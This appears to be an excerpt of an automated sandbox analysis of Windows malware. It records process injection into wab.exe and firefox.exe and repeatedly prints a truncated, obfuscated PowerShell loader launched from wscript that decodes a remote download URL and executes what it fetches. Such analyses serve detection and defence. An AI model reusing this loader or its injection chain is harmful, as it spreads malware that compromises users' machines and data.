        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtSetInformationThread: Direct from: 0x77542B4CJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtQueryAttributesFile: Direct from: 0x77542E6CJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtAllocateVirtualMemory: Direct from: 0x77543C9CJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtCreateUserProcess: Direct from: 0x7754371CJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtQueryInformationProcess: Direct from: 0x77542C26Jump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtResumeThread: Direct from: 0x77542FBCJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtWriteVirtualMemory: Direct from: 0x7754490CJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtDelayExecution: Direct from: 0x77542DDCJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtAllocateVirtualMemory: Direct from: 0x77542BFCJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtReadFile: Direct from: 0x77542ADCJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtQuerySystemInformation: Direct from: 0x77542DFCJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtResumeThread: Direct from: 0x775436ACJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtNotifyChangeKey: Direct from: 0x77543C2CJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtCreateMutant: Direct from: 0x775435CCJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeSection loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\SysWOW64\replace.exeThread register set: target process: 2284Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Windows\SysWOW64\replace.exeThread APC queued: target process: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeJump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3000000Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2CEF9C0Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe GJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe GJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$demonland = 1;$predecreeing='substrin';$predecreeing+='g';function herremaend($sursdt){$monuronsnteranimate=$sursdt.length-$demonland;for($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$alaskans+=$sursdt.$predecreeing.invoke($monurons, $demonland);}$alaskans;}function surere($adipometer){. ($disaffirmative) ($adipometer);}$monostichic=herremaend 'aristmde.imo sjakzsaks.ikortslsportlomplaarelai/hiero5addit..plgk0t,aum an.ta(produwequi.igeniznildebdpa.rao snitwpickesalleg ,ersoni,fantudpos drown1wighe0abbes.unser0snoni;pri o utakwafgifi efugnskal,6casto4benin;r.stb fresxturbu6homog4 radb;round furcrrvebogv matr:famil1 aste2 irre1hvede. fa,u0un,er)gummi unmutg u.dvet lesc arabkadvo,o a.ti/retor2bi,le0taale1folke0overs0mede 1calch0parti1h.and flintfpardoinondirnonvae estufd,teno hus.x pers/murbr1filbe2 lapu1b.udo. un.e0straf ';$apyonin182=herremaend 'eksprupapirs,ingeesucrerspeci-sk.ttasamvigrevaleafkvinu armt.ofag ';$halloffire=herremaend 'planoh fedetsponttko,sip sidesnon,r:speda/efter/friskd kar,rfacadiqv.nsvslidbeal,at.bifalgdiloho socio ,enogsp.cilundereglo i. ,nnac reto afstmgrept/ padauov rgcforsk?dyrebefascixluftrp ,isco banfr f idthuffi=chattd inusotelefw nattnaftalltranco.anelaarbejd send&leggiiunbludrecla= dunj1filmg3 o sts pelliblokpdeuropg isankun olutrafi2redskdbuega7ol,giip.icaiposta6 aposzca,rir parkxc,mpoa ond4macaag soupgtr,jeytingss decoainiqusvoitu5ar,anial.rm0,asufm ulovh eriaadopttudfreb icca ';$startngles=herremaend 'redak>paraf ';$disaffirmative=herremaend 'i ebli vil,e.npatxadelo ';$forfrdiget='tented';surere (herremaend ' ulovssweepefeersttandk-attaccspillodeviontryk.tsodeneprotenopsentlaves dunc - a.prpunderasubmytstal,hnondi prototkun.t:h,lvt\ ebustfirciehusassspytstvesicustrogdreciposugge. vortthalvfx fejetautos strue-udsagvkunsta cpmmludmatusadl.e flin hjemm$,aderfthromoliv or e aafhulnirstanddsennaiarkitgimmigeglosetrubbe;he er ');surere (herremaend 'alkylimuddlfalb i udpi(antiotavissepleurskbsvatmiddl-kronip tanda vipetdu,tthzygne grandtliche:lusk.\gruppta skiespindskantetbajadupirridhvedeo gobl.stra,tsamarxreg st ultr)globa{poly e eostxhillbi skubtraadf} sual;trise ');$tidsskriftsudvlgelserne = herremaend 'shille,lericrisikhkaldeo tjen l nje%ki,keabr.dop lendpbirthdno.sparevalt tiraasnebo% do,e\aastemnyst.efrankd tsaririskikannalawilmam,rfteelamb nbe,hptr.ttoesvveflcri,i.vandddpro,odtopsagddska lserf&halss&udl,s telefe ,ilccrkv,khpooftobugse malth$s are ';surere (herremaend 'gombe$tilbagspa.kl sgepo f,rfbpseu,askrd.l p.og:bi,psffo tirsl wdi kolitfremtubrinjr deciemalmintredi=s,pra(firsic bystmp umpd unde te,ot/pallhc rapg conta$.retct,elamiexu.ad .ibess.othsunto kprejursulteidelphftarlet utilsdiscrubo uldkinesvtilkrl mes,g dv,geergonlvrc.ssprotoesomikrhanden draweboxfi)outte ');surere (herremaend 'anstt$ pibogt,lstl ch,roparrobeutecaorkidlkan i:unsoctdrmmeinucl.r,eproe g
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$demonland = 1;$predecreeing='substrin';$predecreeing+='g';function herremaend($sursdt){$monuronsnteranimate=$sursdt.length-$demonland;for($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$alaskans+=$sursdt.$predecreeing.invoke($monurons, $demonland);}$alaskans;}function surere($adipometer){. ($disaffirmative) ($adipometer);}$monostichic=herremaend 'aristmde.imo sjakzsaks.ikortslsportlomplaarelai/hiero5addit..plgk0t,aum an.ta(produwequi.igeniznildebdpa.rao snitwpickesalleg ,ersoni,fantudpos drown1wighe0abbes.unser0snoni;pri o utakwafgifi efugnskal,6casto4benin;r.stb fresxturbu6homog4 radb;round furcrrvebogv matr:famil1 aste2 irre1hvede. fa,u0un,er)gummi unmutg u.dvet lesc arabkadvo,o a.ti/retor2bi,le0taale1folke0overs0mede 1calch0parti1h.and flintfpardoinondirnonvae estufd,teno hus.x pers/murbr1filbe2 lapu1b.udo. un.e0straf ';$apyonin182=herremaend 'eksprupapirs,ingeesucrerspeci-sk.ttasamvigrevaleafkvinu armt.ofag ';$halloffire=herremaend 'planoh fedetsponttko,sip sidesnon,r:speda/efter/friskd kar,rfacadiqv.nsvslidbeal,at.bifalgdiloho socio ,enogsp.cilundereglo i. ,nnac reto afstmgrept/ padauov rgcforsk?dyrebefascixluftrp ,isco banfr f idthuffi=chattd inusotelefw nattnaftalltranco.anelaarbejd send&leggiiunbludrecla= dunj1filmg3 o sts pelliblokpdeuropg isankun olutrafi2redskdbuega7ol,giip.icaiposta6 aposzca,rir parkxc,mpoa ond4macaag soupgtr,jeytingss decoainiqusvoitu5ar,anial.rm0,asufm ulovh eriaadopttudfreb icca ';$startngles=herremaend 'redak>paraf ';$disaffirmative=herremaend 'i ebli vil,e.npatxadelo ';$forfrdiget='tented';surere (herremaend ' ulovssweepefeersttandk-attaccspillodeviontryk.tsodeneprotenopsentlaves dunc - a.prpunderasubmytstal,hnondi prototkun.t:h,lvt\ ebustfirciehusassspytstvesicustrogdreciposugge. vortthalvfx fejetautos strue-udsagvkunsta cpmmludmatusadl.e flin hjemm$,aderfthromoliv or e aafhulnirstanddsennaiarkitgimmigeglosetrubbe;he er ');surere (herremaend 'alkylimuddlfalb i udpi(antiotavissepleurskbsvatmiddl-kronip tanda vipetdu,tthzygne grandtliche:lusk.\gruppta skiespindskantetbajadupirridhvedeo gobl.stra,tsamarxreg st ultr)globa{poly e eostxhillbi skubtraadf} sual;trise ');$tidsskriftsudvlgelserne = herremaend 'shille,lericrisikhkaldeo tjen l nje%ki,keabr.dop lendpbirthdno.sparevalt tiraasnebo% do,e\aastemnyst.efrankd tsaririskikannalawilmam,rfteelamb nbe,hptr.ttoesvveflcri,i.vandddpro,odtopsagddska lserf&halss&udl,s telefe ,ilccrkv,khpooftobugse malth$s are ';surere (herremaend 'gombe$tilbagspa.kl sgepo f,rfbpseu,askrd.l p.og:bi,psffo tirsl wdi kolitfremtubrinjr deciemalmintredi=s,pra(firsic bystmp umpd unde te,ot/pallhc rapg conta$.retct,elamiexu.ad .ibess.othsunto kprejursulteidelphftarlet utilsdiscrubo uldkinesvtilkrl mes,g dv,geergonlvrc.ssprotoesomikrhanden draweboxfi)outte ');surere (herremaend 'anstt$ pibogt,lstl ch,roparrobeutecaorkidlkan i:unsoctdrmmeinucl.r,eproe g
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$demonland = 1;$predecreeing='substrin';$predecreeing+='g';function herremaend($sursdt){$monuronsnteranimate=$sursdt.length-$demonland;for($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$alaskans+=$sursdt.$predecreeing.invoke($monurons, $demonland);}$alaskans;}function surere($adipometer){. ($disaffirmative) ($adipometer);}$monostichic=herremaend 'aristmde.imo sjakzsaks.ikortslsportlomplaarelai/hiero5addit..plgk0t,aum an.ta(produwequi.igeniznildebdpa.rao snitwpickesalleg ,ersoni,fantudpos drown1wighe0abbes.unser0snoni;pri o utakwafgifi efugnskal,6casto4benin;r.stb fresxturbu6homog4 radb;round furcrrvebogv matr:famil1 aste2 irre1hvede. fa,u0un,er)gummi unmutg u.dvet lesc arabkadvo,o a.ti/retor2bi,le0taale1folke0overs0mede 1calch0parti1h.and flintfpardoinondirnonvae estufd,teno hus.x pers/murbr1filbe2 lapu1b.udo. un.e0straf ';$apyonin182=herremaend 'eksprupapirs,ingeesucrerspeci-sk.ttasamvigrevaleafkvinu armt.ofag ';$halloffire=herremaend 'planoh fedetsponttko,sip sidesnon,r:speda/efter/friskd kar,rfacadiqv.nsvslidbeal,at.bifalgdiloho socio ,enogsp.cilundereglo i. ,nnac reto afstmgrept/ padauov rgcforsk?dyrebefascixluftrp ,isco banfr f idthuffi=chattd inusotelefw nattnaftalltranco.anelaarbejd send&leggiiunbludrecla= dunj1filmg3 o sts pelliblokpdeuropg isankun olutrafi2redskdbuega7ol,giip.icaiposta6 aposzca,rir parkxc,mpoa ond4macaag soupgtr,jeytingss decoainiqusvoitu5ar,anial.rm0,asufm ulovh eriaadopttudfreb icca ';$startngles=herremaend 'redak>paraf ';$disaffirmative=herremaend 'i ebli vil,e.npatxadelo ';$forfrdiget='tented';surere (herremaend ' ulovssweepefeersttandk-attaccspillodeviontryk.tsodeneprotenopsentlaves dunc - a.prpunderasubmytstal,hnondi prototkun.t:h,lvt\ ebustfirciehusassspytstvesicustrogdreciposugge. vortthalvfx fejetautos strue-udsagvkunsta cpmmludmatusadl.e flin hjemm$,aderfthromoliv or e aafhulnirstanddsennaiarkitgimmigeglosetrubbe;he er ');surere (herremaend 'alkylimuddlfalb i udpi(antiotavissepleurskbsvatmiddl-kronip tanda vipetdu,tthzygne grandtliche:lusk.\gruppta skiespindskantetbajadupirridhvedeo gobl.stra,tsamarxreg st ultr)globa{poly e eostxhillbi skubtraadf} sual;trise ');$tidsskriftsudvlgelserne = herremaend 'shille,lericrisikhkaldeo tjen l nje%ki,keabr.dop lendpbirthdno.sparevalt tiraasnebo% do,e\aastemnyst.efrankd tsaririskikannalawilmam,rfteelamb nbe,hptr.ttoesvveflcri,i.vandddpro,odtopsagddska lserf&halss&udl,s telefe ,ilccrkv,khpooftobugse malth$s are ';surere (herremaend 'gombe$tilbagspa.kl sgepo f,rfbpseu,askrd.l p.og:bi,psffo tirsl wdi kolitfremtubrinjr deciemalmintredi=s,pra(firsic bystmp umpd unde te,ot/pallhc rapg conta$.retct,elamiexu.ad .ibess.othsunto kprejursulteidelphftarlet utilsdiscrubo uldkinesvtilkrl mes,g dv,geergonlvrc.ssprotoesomikrhanden draweboxfi)outte ');surere (herremaend 'anstt$ pibogt,lstl ch,roparrobeutecaorkidlkan i:unsoctdrmmeinucl.r,eproe gJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$demonland = 1;$predecreeing='substrin';$predecreeing+='g';function herremaend($sursdt){$monuronsnteranimate=$sursdt.length-$demonland;for($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$alaskans+=$sursdt.$predecreeing.invoke($monurons, $demonland);}$alaskans;}function surere($adipometer){. ($disaffirmative) ($adipometer);}$monostichic=herremaend 'aristmde.imo sjakzsaks.ikortslsportlomplaarelai/hiero5addit..plgk0t,aum an.ta(produwequi.igeniznildebdpa.rao snitwpickesalleg ,ersoni,fantudpos drown1wighe0abbes.unser0snoni;pri o utakwafgifi efugnskal,6casto4benin;r.stb fresxturbu6homog4 radb;round furcrrvebogv matr:famil1 aste2 irre1hvede. fa,u0un,er)gummi unmutg u.dvet lesc arabkadvo,o a.ti/retor2bi,le0taale1folke0overs0mede 1calch0parti1h.and flintfpardoinondirnonvae estufd,teno hus.x pers/murbr1filbe2 lapu1b.udo. un.e0straf ';$apyonin182=herremaend 'eksprupapirs,ingeesucrerspeci-sk.ttasamvigrevaleafkvinu armt.ofag ';$halloffire=herremaend 'planoh fedetsponttko,sip sidesnon,r:speda/efter/friskd kar,rfacadiqv.nsvslidbeal,at.bifalgdiloho socio ,enogsp.cilundereglo i. ,nnac reto afstmgrept/ padauov rgcforsk?dyrebefascixluftrp ,isco banfr f idthuffi=chattd inusotelefw nattnaftalltranco.anelaarbejd send&leggiiunbludrecla= dunj1filmg3 o sts pelliblokpdeuropg isankun olutrafi2redskdbuega7ol,giip.icaiposta6 aposzca,rir parkxc,mpoa ond4macaag soupgtr,jeytingss decoainiqusvoitu5ar,anial.rm0,asufm ulovh eriaadopttudfreb icca ';$startngles=herremaend 'redak>paraf ';$disaffirmative=herremaend 'i ebli vil,e.npatxadelo ';$forfrdiget='tented';surere (herremaend ' ulovssweepefeersttandk-attaccspillodeviontryk.tsodeneprotenopsentlaves dunc - a.prpunderasubmytstal,hnondi prototkun.t:h,lvt\ ebustfirciehusassspytstvesicustrogdreciposugge. vortthalvfx fejetautos strue-udsagvkunsta cpmmludmatusadl.e flin hjemm$,aderfthromoliv or e aafhulnirstanddsennaiarkitgimmigeglosetrubbe;he er ');surere (herremaend 'alkylimuddlfalb i udpi(antiotavissepleurskbsvatmiddl-kronip tanda vipetdu,tthzygne grandtliche:lusk.\gruppta skiespindskantetbajadupirridhvedeo gobl.stra,tsamarxreg st ultr)globa{poly e eostxhillbi skubtraadf} sual;trise ');$tidsskriftsudvlgelserne = herremaend 'shille,lericrisikhkaldeo tjen l nje%ki,keabr.dop lendpbirthdno.sparevalt tiraasnebo% do,e\aastemnyst.efrankd tsaririskikannalawilmam,rfteelamb nbe,hptr.ttoesvveflcri,i.vandddpro,odtopsagddska lserf&halss&udl,s telefe ,ilccrkv,khpooftobugse malth$s are ';surere (herremaend 'gombe$tilbagspa.kl sgepo f,rfbpseu,askrd.l p.og:bi,psffo tirsl wdi kolitfremtubrinjr deciemalmintredi=s,pra(firsic bystmp umpd unde te,ot/pallhc rapg conta$.retct,elamiexu.ad .ibess.othsunto kprejursulteidelphftarlet utilsdiscrubo uldkinesvtilkrl mes,g dv,geergonlvrc.ssprotoesomikrhanden draweboxfi)outte ');surere (herremaend 'anstt$ pibogt,lstl ch,roparrobeutecaorkidlkan i:unsoctdrmmeinucl.r,eproe gJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
